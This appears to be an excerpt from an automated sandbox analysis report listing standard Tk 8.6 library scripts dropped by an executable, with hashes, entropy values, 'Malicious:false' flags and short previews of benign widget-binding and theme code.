                                                                                                                                                                                                                              SHA1:612E021BA25B5E512A0DFD48B6E77FC72894A6B9
                                                                                                                                                                                                                              SHA-256:EEC90404F702D3CFBFAEC0F13BF5ED1EBEB736BEE12D7E69770181A25401C61F
                                                                                                                                                                                                                              SHA-512:E4E0AB15EB9B3118C30CD2FF8E5AF87C549EAA9B640FFD809A928D96B4ADDEFB9D25EFDD1090FBD0019129CDF355BB2F277BC7194001BA1D2ED4A581110CEAFC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scrlbar.tcl --..#..# This file defines the default bindings for Tk scrollbar widgets...# It also provides procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for scrollbars...#-------------------------------------------------------------------------....# Standard Motif bindings:..if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {....bind Scrollbar <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. %W activate [%W identify %x %y]..}..bind Scrollbar <Motion> {.. %W activate [%
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16543
                                                                                                                                                                                                                              Entropy (8bit):5.034958189335699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:IMpfyeKu9TzD0E8+9T1wqBaQKpiqQr7E32fnzXfWJU:IMpfyeKu9Tx8WODTp2zPP
                                                                                                                                                                                                                              MD5:EAA36F0AA69AE19DDBDD0448FBAD9D4D
                                                                                                                                                                                                                              SHA1:EB0ADB4F4D937BAC2F17480ADAF6F948262E754D
                                                                                                                                                                                                                              SHA-256:747889C3086C917A34554A9DC495BC0C08A03FD3A5828353ED2A64B97F376835
                                                                                                                                                                                                                              SHA-512:C8368F19EC6842ED67073B9FC9C9274107E643324CB23B28C54DF63FB720F63B043281B30DBEA053D08481B0442A87465F715A8AA0711B01CE83FF7B9F8A4F4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# spinbox.tcl --..#..# This file defines the default bindings for Tk spinbox widgets and provides..# procedures that help in implementing those bindings. The spinbox builds..# off the entry widget, so it can reuse Entry bindings and procedures...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1999-2000 Jeffrey Hobbs..# Copyright (c) 2000 Ajuba Solutions..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20523
                                                                                                                                                                                                                              Entropy (8bit):4.786929402401609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:eeVL0UI9Ms++J7VT/hc+ISyNsATbOan/uW/UFQ1gs1gxtKZufe2SvdJcmq/YbhEB:eeF0UI9Ms++J7VT/hc+ISyCATbOan2W+
                                                                                                                                                                                                                              MD5:9378397DD3DCA9DFB181F6F512B15631
                                                                                                                                                                                                                              SHA1:4F95DD6B658B6A912725DC7D6226F8414020D6C7
                                                                                                                                                                                                                              SHA-256:B04B1A675572E6FCD12C5FE82C4FD0930395548436FF93D848BF340AE202E7E3
                                                                                                                                                                                                                              SHA-512:D28CC3C8F3D0B1B2371CBD9EE29AC6881BABD8A07C762FF8F3284449998EE44FA44752CC8AB0DE47A3492776CE1D13BC8EA18CFDBDF710639D2D62D02CB917A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]]..set auto_index(::tk::ButtonAutoInvoke) [list sou
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5309
                                                                                                                                                                                                                              Entropy (8bit):4.74935501162253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wfQXIqAv6iEwYtKVlPBnXWASbvMsDjXKpQQkK2tTsSZQ7Fowqm2K5r:wf+IqI6iU43PJYbvMsDjXKpsK2tISyZV
                                                                                                                                                                                                                              MD5:5F042DE8AD8941C7B9EF6D7BE06C86E4
                                                                                                                                                                                                                              SHA1:A4DFCEA2ACCAC2E85EAAA186DC765086D1E3AA3C
                                                                                                                                                                                                                              SHA-256:A4A8568633F827B54326640E6D1C3FDE4978EDC9E9FA1FB1D7B58F189DF1B1DC
                                                                                                                                                                                                                              SHA-512:E92A00028696A1557666CAB1C25AE6B63F25D75A9811BFAC56DFC069ECC769CC751B71CC81FA85C9CDE8F7FB6D7121EB64B58548CEE8AFE3F6C4A5C243507216
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tearoff.tcl --..#..# This file contains procedures that implement tear-off menus...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk::TearoffMenu --..# Given the name of a menu, this procedure creates a torn-off menu..# that is identical to the given menu (including nested submenus)...# The new torn-off menu exists as a toplevel window managed by the..# window manager. The return value is the name of the new menu...# The window is created at the point specified by x and y..#..# Arguments:..# w -...The menu to be torn-off (duplicated)...# x -...x coordinate where window is created..# y -...y coordinate where window is created....proc ::tk::TearOffMenu {w {x 0} {y 0}} {.. # Find a unique name to use for the torn-off menu. Find the first.. # ancestor of w that is a
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34969
                                                                                                                                                                                                                              Entropy (8bit):4.95825801435303
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:Rp4LaQDlOrqquMwIMyv4Et8avJLgmTGXs1bYMeNnnZl8n6KRD:RYK8aymTGs1b0xncn6KR
                                                                                                                                                                                                                              MD5:9CA5094ED6FE46620ABF090BF8E2AE63
                                                                                                                                                                                                                              SHA1:60DC3C2E3F69CE5B6DB4F2B3A1F3C109D766BC63
                                                                                                                                                                                                                              SHA-256:AB88556E349F03BACA2D8DC2121071A4F299DB86F484CAB2D9249FF4C7007564
                                                                                                                                                                                                                              SHA-512:0B0C20A754BE744A7FA214BA06AB0744A9BC466D51F96310D97EA1E61119A8ACFEF24E6DC5C4EBDD2C126BF84ACE74FFE622E9641C87E5A240DD13D1F7B5E6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# text.tcl --..#..# This file defines the default bindings for Tk text widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of ::tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# char -..Character position on the line; kept in order..#...to allow moving up or down past short lines while..#...still remembering the desired position...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button we
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24102
                                                                                                                                                                                                                              Entropy (8bit):5.137459715823081
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NJyxt+WaB9USY15gSgC3DbTbXLXKr3cIXyDAbK2LMGgtewT+3oFQRyH5bAy59HmD:NJItNe9USZblXysm7GgteoFQRYMESL
                                                                                                                                                                                                                              MD5:184D05201893B2042D3FA6140FCF277C
                                                                                                                                                                                                                              SHA1:AAD67797864456749ADF0C4A1C0BE52F563C8FB8
                                                                                                                                                                                                                              SHA-256:1D5E7518AFC1382E36BF13FC5196C8A7CD93A4E9D24ACF445522564245A489B0
                                                                                                                                                                                                                              SHA-512:291BDF793CABC5EC27E8265A8A313FE0F4ACAB4DB6CE507A46488A83EEF72CD43CF5815762B22D1C8D64A9EEDEA927E109F937E6573058E5493B1354DD449CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tk.tcl --..#..# Initialization script normally executed in the interpreter for each Tk-based..# application. Arranges class bindings for widgets...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....# Verify that we have Tk binary and script components from the same release..package require -exact Tk 8.6.13.....# Create a ::tk namespace..namespace eval ::tk {.. # Set up the msgcat commands.. namespace eval msgcat {...namespace export mc mcmax.. if {[interp issafe] || [catch {package require msgcat}]} {.. # The msgcat package is not available. Supply our own.. # minimal replacement... proc mc {src args} {.. return [format $src {*}$args].. }.. proc mc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39557
                                                                                                                                                                                                                              Entropy (8bit):5.186073482848965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+oj+AqE9cn9tJNgDt0/vsKulXgo65Eh6pQb:+6+Zv/ggEdio65Ehdb
                                                                                                                                                                                                                              MD5:670837EBC804E7B6E2F65F840BC508D6
                                                                                                                                                                                                                              SHA1:2DD316487F87DDE5D05F65F564CAE4E1306CE662
                                                                                                                                                                                                                              SHA-256:3AAA66AE8E74B94481C3F6642634E78BB5D7892771E7C27B54DFA56DED0B2F3C
                                                                                                                                                                                                                              SHA-512:BB8350ADDF1A25C037DFD60A4AFCBF401CACAD2A370B60BD0BA0981D938C46394BD8D40D1E9A66F4E3C46FCC2A41CF688E78C4F1FE918B45E70D3E92D8B3D116
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tkfbox.tcl --..#..#.Implements the "TK" standard file selection dialog box. This dialog..#.box is used on the Unix platforms whenever the tk_strictMotif flag is..#.not set...#..#.The "TK" standard file selection dialog box is similar to the file..#.selection dialog box on Win95(TM). The user can navigate the..#.directories by clicking on the folder icons or by selecting the..#."Directory" option menu. The user can select files by clicking on the..#.file icons or by entering a filename in the "Filename:" entry...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {.. namespace import -force ::tk::msgcat::*.. variable showHiddenBtn 0.. variable showHiddenVar 1.... # Create the images if they did not already exist... if {![info exists ::tk::Priv(updirImage)]} {...s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3713
                                                                                                                                                                                                                              Entropy (8bit):4.915055696129498
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:InrWdo3L7Fe5qusQGdrMNnQbfIxEOxE0kFgG0FgGouox9FrGVuwg3kNcT+z5UlEr:UWdsOBn/1i+pqxwNjKs
                                                                                                                                                                                                                              MD5:01F28512E10ACBDDF93AE2BB29E343BC
                                                                                                                                                                                                                              SHA1:C9CF23D6315218B464061F011E4A9DC8516C8F1F
                                                                                                                                                                                                                              SHA-256:AE0437FB4E0EBD31322E4EACA626C12ABDE602DA483BB39D0C5EE1BC00AB0AF4
                                                                                                                                                                                                                              SHA-512:FE3BAE36DDB67F6D7A90B7A91B6EC1A009CF26C0167C46635E5A9CEAEC9083E59DDF74447BF6F60399657EE9604A2314B170F78A921CF948B2985DDF02A89DA6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set: Alternate theme..#....namespace eval ttk::theme::alt {.... variable colors.. array set colors {...-frame .."#d9d9d9"...-window.."#ffffff"...-darker ."#c3c3c3"...-border.."#414141"...-activebg ."#ececec"...-disabledfg."#a3a3a3"...-selectbg."#4a6984"...-selectfg."#ffffff"...-altindicator."#aaaaaa".. }.... ttk::style theme settings alt {.....ttk::style configure "." \... -background .$colors(-frame) \... -foreground .black \... -troughcolor.$colors(-darker) \... -bordercolor.$colors(-border) \... -selectbackground .$colors(-selectbg) \... -selectforeground .$colors(-selectfg) \... -font ..TkDefaultFont \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)] ;...ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -padding "1 1" \... -reli
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3838
                                                                                                                                                                                                                              Entropy (8bit):4.940737732832436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WdbclJFvlyLi+8OWXgQahpvAdNutdHrFBlCFBK2tdHkFBlhKgY1geAWUWeFVvtdp:C8EQPNeWgFeqdXj
                                                                                                                                                                                                                              MD5:F07A3A86362E9E253BE91F59714FE134
                                                                                                                                                                                                                              SHA1:84DE1AB2EAE62E4B114F0E613BD94955AFA9E6C7
                                                                                                                                                                                                                              SHA-256:E199CC9C429B35A09721D0A22543C3729E2B8462E68DFA158C0CEC9C70A0D79D
                                                                                                                                                                                                                              SHA-512:324EAF9F857076CA4FECB26D8DF76F8BB1D3F15EAE55D6B6C9689BF1682B306AC7A3592B6A518D23F9FE4DC21EFB6ACF1ECA948F889FA1ADFFA0E12C0BEAB57F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Aqua theme (OSX native look and feel)..#....namespace eval ttk::theme::aqua {.. ttk::style theme settings aqua {.....ttk::style configure . \... -font TkDefaultFont \... -background systemWindowBackgroundColor \... -foreground systemLabelColor \... -selectbackground systemSelectedTextBackgroundColor \... -selectforeground systemSelectedTextColor \... -selectborderwidth 0 \... -insertwidth 1.....ttk::style map . \... -foreground {....disabled systemDisabledControlTextColor....background systemLabelColor} \... -selectbackground {....background systemSelectedTextBackgroundColor....!focus systemSelectedTextBackgroundColor} \... -selectforeground {....background systemSelectedTextColor....!focus systemSelectedTextColor}.....# Button...ttk::style configure TButton -anchor center -width -6 \... -foreground systemControlTextColor...ttk::style map TButton \... -foreground {....pressed white... {alternate !pressed !background} white}...ttk::styl
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3014
                                                                                                                                                                                                                              Entropy (8bit):4.917794267131833
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:A5N+EqJWR1eTC01cG61ELLgrDgk1JgQ6TQGvhV5giT6TUP+3JWMHTeJ:kN+RQfccG61ooDgQ6dNT6TUP+PHO
                                                                                                                                                                                                                              MD5:D4BF1AF5DCDD85E3BD11DBF52EB2C146
                                                                                                                                                                                                                              SHA1:B1691578041319E671D31473A1DD404855D2038B
                                                                                                                                                                                                                              SHA-256:E38A9D1F437981AA6BF0BDD074D57B769A4140C0F7D9AFF51743FE4ECC6DFDDF
                                                                                                                                                                                                                              SHA-512:25834B4B231F4FF1A88EEF67E1A102D1D0546EC3B0D46856258A6BE6BBC4B381389C28E2EB60A01FF895DF24D6450CD16CA449C71F82BA53BA438A4867A47DCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for Buttons, Checkbuttons, and Radiobuttons...#..# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed"..# state; widgets remain "active" if the pointer is dragged out...# This doesn't seem to be conventional, but it's a nice way..# to provide extra feedback while the grab is active...# (If the button is released off the widget, the grab deactivates and..# we get a <Leave> event then, which turns off the "active" state)..#..# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are..# delivered to the widget which received the initial <Button>..# event. However, Tk [grab]s (#1223103) and menu interactions..# (#1222605) can interfere with this. To guard against spurious..# <Button1-Enter> events, the <Button1-Enter> binding only sets..# the pressed state if the button is currently active...#....namespace eval ttk::button {}....bind TButton <Enter> ..{ %W instate !disabled {%W state active} }..bind TButton <Leave>..{ %W state !active }..bind TButton <s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4809
                                                                                                                                                                                                                              Entropy (8bit):4.905115353394083
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:KrS4se/XhW03cC7TxPp/uo1ZUb0WZvSoetCgV+tMWG3xT3xgNB4x76FAuoxVYuIJ:oS4sSjWwFAGkhiP3xT3xL6B2bbe
                                                                                                                                                                                                                              MD5:2B20E7B2E6BDDBEB14F5F63BF38DBF24
                                                                                                                                                                                                                              SHA1:43DB48094C4BD7DE3B76AFBC051D887FEFE9887E
                                                                                                                                                                                                                              SHA-256:CFFC59931FDD1683AD23895E92522CF49B099128753FCDFF34374024E42CF995
                                                                                                                                                                                                                              SHA-512:1EB5EA78D26D18EAD6563AFBF1798F71723001DCC945E7DB3E4368564D0563029BE3565876AD8CB97331CFE34B2A0A313FA1BF252B87049160FE5DCD65434775
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# "Clam" theme...#..# Inspired by the XFCE family of Gnome themes...#....namespace eval ttk::theme::clam {.. variable colors.. array set colors {...-disabledfg.."#999999"...-frame .."#dcdad5"...-window .."#ffffff"...-dark..."#cfcdc8"...-darker .."#bab5ab"...-darkest.."#9e9a91"...-lighter.."#eeebe7"...-lightest .."#ffffff"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-altindicator.."#5895bc"...-disabledaltindicator."#a0a0a0".. }.... ttk::style theme settings clam {.....ttk::style configure "." \... -background $colors(-frame) \... -foreground black \... -bordercolor $colors(-darkest) \... -darkcolor $colors(-dark) \... -lightcolor $colors(-lighter) \... -troughcolor $colors(-darker) \... -selectbackground $colors(-selectbg) \... -selectforeground $colors(-selectfg) \... -selectborderwidth 0 \... -font TkDefaultFont \... ;.....ttk::style map "." \... -background [list disabled $colors(-frame) \..... active $colors(-lighter)] \..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3864
                                                                                                                                                                                                                              Entropy (8bit):4.935603001745302
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:zcJZjdWs+WVB4ULsMF7tnvnuSuqo5DKxiFgG0FgGHx9FrGTtu/3Kt+iW2PbuAk38:zcJZEstB4UoituSm+VtYErY
                                                                                                                                                                                                                              MD5:0205663142775F4EF2EB104661D30979
                                                                                                                                                                                                                              SHA1:452A0D613288A1CC8A1181C3CC1167E02AA69A73
                                                                                                                                                                                                                              SHA-256:424BBA4FB6836FEEBE34F6C176ED666DCE51D2FBA9A8D7AA756ABCBBAD3FC1E3
                                                                                                                                                                                                                              SHA-512:FB4D212A73A6F5A8D2774F43D310328B029B52B35BEE133584D8326363B385AB7AA4AE25E98126324CC716962888321E0006E5F6EF8563919A1D719019B2D117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# "classic" Tk theme...#..# Implements Tk's traditional Motif-like look and feel...#....namespace eval ttk::theme::classic {.... variable colors; array set colors {...-frame.."#d9d9d9"...-window.."#ffffff"...-activebg."#ececec"...-troughbg."#c3c3c3"...-selectbg."#c3c3c3"...-selectfg."#000000"...-disabledfg."#a3a3a3"...-indicator."#b03060"...-altindicator."#b05e5e".. }.... ttk::style theme settings classic {...ttk::style configure "." \... -font..TkDefaultFont \... -background..$colors(-frame) \... -foreground..black \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -troughcolor.$colors(-troughbg) \... -indicatorcolor.$colors(-frame) \... -highlightcolor.$colors(-frame) \... -highlightthickness.1 \... -selectborderwidth.1 \... -insertwidth.2 \... ;.....# To match pre-Xft X11 appearance, use:...#.ttk::style configure . -font {Helvetica 12 bold}.....ttk::style map "." -background \... [list disabled
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12718
                                                                                                                                                                                                                              Entropy (8bit):5.063548300335668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:otLzBJ9SfinaXUBLPYXlk7fKiLH+AzIoJdJwGknmyLsxoVEQGITse8g5sarkT32e:wB5aXmLPYXmrKxLL7A
                                                                                                                                                                                                                              MD5:F7065D345A4BFB3127C3689BF1947C30
                                                                                                                                                                                                                              SHA1:9631C05365B0F5A36E4CA5CBA83628CCD7FCBDE1
                                                                                                                                                                                                                              SHA-256:68EED4AF6D2EC5B3EA24B1122A704B040366CBE2F458103137479352FFA1475A
                                                                                                                                                                                                                              SHA-512:74B99B9E326680150DD5EC7263192691BCD8A71B2A4EE7F3177DEDDD43E924A7925085C6D372731A70570F96B3924450255B2F54CA3B9C44D1160CA37E715B00
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Combobox bindings...#..# <<NOTE-WM-TRANSIENT>>:..#..#.Need to set [wm transient] just before mapping the popdown..#.instead of when it's created, in case a containing frame..#.has been reparented [#1818441]...#..#.On Windows: setting [wm transient] prevents the parent..#.toplevel from becoming inactive when the popdown is posted..#.(Tk 8.4.8+)..#..#.On X11: WM_TRANSIENT_FOR on override-redirect windows..#.may be used by compositing managers and by EWMH-aware..#.window managers (even though the older ICCCM spec says..#.it's meaningless)...#..#.On OSX: [wm transient] does utterly the wrong thing...#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]...#.The "noActivates" attribute prevents the parent toplevel..#.from deactivating when the popdown is posted, and is also..#.necessary for "help" windows to receive mouse events...#."hideOnSuspend" makes the popdown disappear (resp. reappear)..#.when the parent toplevel is deactivated (resp. reactivated)...#.(see [#18147
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4674
                                                                                                                                                                                                                              Entropy (8bit):4.836935825704301
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DRYEqfLDxGmxGUetobPT6t6brv0q3O4Uxz0:DWEqTDbxdKobPqe5PUxw
                                                                                                                                                                                                                              MD5:1A799FE3754307A5AADE98C367E2F5D7
                                                                                                                                                                                                                              SHA1:C64BE4B77F0D298610F4EE20FCEBBAEE3C8B5F22
                                                                                                                                                                                                                              SHA-256:5B33F32B0139663347D6CF70A5A838F8E4554E0E881E97C8478B77733162EA73
                                                                                                                                                                                                                              SHA-512:89F367F9A59730BCDFC5ABDE0E35A10B72A1F19C68A768BA4524C938EF5C5CAF094C1BFA8FC74173F65201F6617544223C2143252A9F691EE9AAA7543315179F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Map symbolic cursor names to platform-appropriate cursors...#..# The following cursors are defined:..#..#.standard.-- default cursor for most controls..#.""..-- inherit cursor from parent window..#.none..-- no cursor..#..#.text..-- editable widgets (entry, text)..#.link..-- hyperlinks within text..#.crosshair.-- graphic selection, fine control..#.busy..-- operation in progress..#.forbidden.-- action not allowed..#..#.hresize..-- horizontal resizing..#.vresize..-- vertical resizing..#..# Also resize cursors for each of the compass points,..# {nw,n,ne,w,e,sw,s,se}resize...#..# Platform notes:..#..# Windows doesn't distinguish resizing at the 8 compass points,..# only horizontal, vertical, and the two diagonals...#..# OSX doesn't have resize cursors for nw, ne, sw, or se corners...# We use the Tk-defined X11 fallbacks for these...#..# X11 doesn't have a "forbidden" cursor (usually a slashed circle);..# "pirate" seems to be the conventional cursor for this purpose...#..# Windows has a
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4553
                                                                                                                                                                                                                              Entropy (8bit):4.933885986949396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lNl3u3lCFUeuMGN3xbVJU+N3xbVJh3IwxkxlBqatUrtY:zl3ZUe9GN3NVC+N3NVjqntUZY
                                                                                                                                                                                                                              MD5:FC79F42761D63172163C08F0F5C94436
                                                                                                                                                                                                                              SHA1:AABAB4061597D0D6DC371F46D14AAA1A859096DF
                                                                                                                                                                                                                              SHA-256:49AE8FAF169165BDDAF01D50B52943EBAB3656E9468292B7890BE143D0FCBC91
                                                                                                                                                                                                                              SHA-512:F619834A95C9DEB93F8184BCC437D701A961C77E24A831ADBD5C145556D26986BFDA2A6ACB9E8784F8B2380E122D12AC893EB1B6ACF03098922889497E1FF9EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for default theme...#....namespace eval ttk::theme::default {.. variable colors.. array set colors {...-frame..."#d9d9d9"...-foreground.."#000000"...-window..."#ffffff"...-text .."#000000"...-activebg.."#ececec"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-darker .."#c3c3c3"...-disabledfg.."#a3a3a3"...-indicator.."#4a6984"...-disabledindicator."#a3a3a3"...-altindicator.."#9fbdd8"...-disabledaltindicator."#c0c0c0".. }.... ttk::style theme settings default {.....ttk::style configure "." \... -borderwidth .1 \... -background .$colors(-frame) \... -foreground .$colors(-foreground) \... -troughcolor .$colors(-darker) \... -font ..TkDefaultFont \... -selectborderwidth.1 \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -insertwidth .1 \... -indicatordiameter.10 \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)]...ttk::style map "."
